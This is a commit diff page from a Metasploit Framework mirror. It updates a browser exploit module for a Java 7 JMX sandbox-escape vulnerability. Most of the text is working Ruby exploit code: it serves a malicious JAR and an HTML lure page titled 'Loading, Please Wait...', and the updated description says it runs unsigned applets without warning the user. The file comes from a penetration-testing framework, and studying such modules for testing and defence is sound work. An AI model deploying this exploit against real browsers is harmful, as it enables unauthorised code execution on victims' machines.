infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

description and references updated

bug/bundler_fix
jvazquez-r7 2013-02-20 18:14:53 +01:00
parent da9e58ef79
commit bf216cca5c
1 changed files with 35 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
View File

@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote
super( update_info( info,
'Name' => 'Java Applet JMX Remote Code Execution',
'Description' => %q{
This module abuses the JMX classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in February of 2013. The
vulnerability affects Java version 7u11 and earlier.
This module abuses the JMX classes from a Java Applet to run arbitrary Java code
outside of the sandbox as exploited in the wild in February of 2013. Additionally,
this module bypasses default security settings introduced in Java 7 Update 10 to run
unsigned applet without displaying any warning to the user.
},
'License' => MSF_LICENSE,
'Author' =>
@ -42,7 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
[ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
[ 'URL', 'http://pastebin.com/QWU1rqjf' ]
[ 'URL', 'http://pastebin.com/QWU1rqjf' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
@ -83,6 +85,17 @@ class Metasploit3 < Msf::Exploit::Remote
case request.uri
when /\.jar$/i
print_status("Sending JAR")
send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } )
when /\/$/
print_status("Sending HTML")
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_jar
paths = [
[ "Exploit.ser" ],
[ "Exploit.class" ],
@ -105,21 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote
jar.add_file(path.join("/"), data)
fd.close
end
print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
when /\/$/
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
return jar.pack
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="sample.jar"></embed>|
html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>|
html += %Q|</applet></body></html>|
return html
end